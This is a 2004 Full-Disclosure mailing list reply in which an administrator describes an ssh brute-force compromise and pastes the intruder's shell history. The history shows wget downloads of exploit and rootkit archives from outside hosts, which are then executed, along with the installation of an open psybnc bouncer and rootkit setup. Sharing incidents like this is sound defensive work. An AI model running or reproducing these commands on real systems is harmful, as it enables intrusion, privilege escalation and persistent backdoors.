Full Disclosure mailing list archives
Re: !SPAM! Automated ssh scanning
From: Richard Verwayen <holle () ackw de>
Date: Thu, 26 Aug 2004 19:44:46 +0200
On Thu, 2004-08-26 at 18:36, Tremaine wrote:
On Thu, 26 Aug 2004 09:43:13 -0500 (CDT), Ron DuFresne <dufresne () winternet com> wrote:On Thu, 26 Aug 2004, Richard Verwayen wrote:On Thu, 2004-08-26 at 15:12, Todd Towles wrote:The kernel could be save. But with weak passwords, you are toast. Any automated tool would test guest/guest.Hello Todd! You are right about the passwords, but guest is only a unprivileged account as you may have on many prodruction machines. But they managed to become root on this machine due to a kernel(?) exploit! Should I then consider any woody system to be insecure to let people work at?If your uasers are not trustable, then they should not have access to local systems of yours. Once a person has a shell, then they are 95% to root. Thanks, Ron DuFresneFair point... but it would still be nice to determine precisely how they are getting root access so preventative measures can be taken and the hole plugged.
Some more infos maybe useful: Hosts from which my "guest" they logged in 213.154.103.49 213.154.103.40 213.154.103.49 210.177.241.201 66.250.216.109 66.250.216.109 210.52.66.56 62.108.109.163 62.108.109.163 213-35-199-254-dsl.mus.estpak.ee 0x50a349b6.unknown.tele.dk Way the attacker got r00t (as listed in guest's history) PATH=:PATH xs uname -a exit PATH=:PATH xs logout exit w cat /etc/hosts cd /tmp wget www.bo2k-rulez.net/a chmod +x a ./a wget www.bo2k-rulez.net/psybnc.tgz tar zfvx psybnc.tgz cd psybnc make mv psybnc xs sh uname -a ls pico psybnc.conf rm -rf psybnc.conf echo "PSYBNC.SYSTEM.PORT1=21221" >> psybnc.conf echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf killall -9 xs sh exit logout cd /var/tmp/ wget sky.prohosting.com/awxro/linux/xpl.tar.gz tar xzvf xpl.tar.gz xpl/ptr1 wget www.bo2k-rulez.net/a ./a chmod =x a ./a rm -rf a exit exit passwd passwd ls -al hostname w cat /etc/hosts ifconfig /sbin/ifconfig cd /tmp mkdir ... wget www.corbeanu.as.ro/t.gz tar zxvf t.gz ./t mv fastmech httpd export PAT="." export PATH="." httpd httpd wget www.corbeanu.as.ro/god.tgz wget www.geocities.com/sniffhax/god.tgz wget roamy.com/god.tgz wget roarmy.com/god.tgz tar zxvf god.tgz cd god ./install wget www.corbeanu.as.ro/rkid.tgz tar zxvf rkid.tgz cd rkid ./setup stelian 6006 ls ls -a wget www.generatiapro.go.ro/fast.tgz tar zxvf fast.tgz cd fastmech bash -- Richard Verwayen <holle () ackw de> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: !SPAM! Automated ssh scanning Todd Towles (Aug 26)
- RE: !SPAM! Automated ssh scanning Richard Verwayen (Aug 26)
- RE: !SPAM! Automated ssh scanning Ron DuFresne (Aug 26)
- Re: !SPAM! Automated ssh scanning Tremaine (Aug 26)
- Re: !SPAM! Automated ssh scanning Richard Verwayen (Aug 26)
- Re: !SPAM! Automated ssh scanning Jan Luehr (Aug 26)
- RE: !SPAM! Automated ssh scanning Ron DuFresne (Aug 26)
- Re: !SPAM! Automated ssh scanning Barry Fitzgerald (Aug 26)
- Re: !SPAM! Automated ssh scanning Ron DuFresne (Aug 26)
- RE: !SPAM! Automated ssh scanning Richard Verwayen (Aug 26)
- Re: !SPAM! Automated ssh scanning Jan Luehr (Aug 26)
- Re: !SPAM! Automated ssh scanning Ron DuFresne (Aug 26)
- Re Automated ssh scanning Mister Coffee (Aug 26)
- <Possible follow-ups>
- RE: !SPAM! Automated ssh scanning Todd Towles (Aug 26)
- RE: !SPAM! Automated ssh scanning Stephen Agar (Aug 26)
- RE: !SPAM! Automated ssh scanning Ron DuFresne (Aug 26)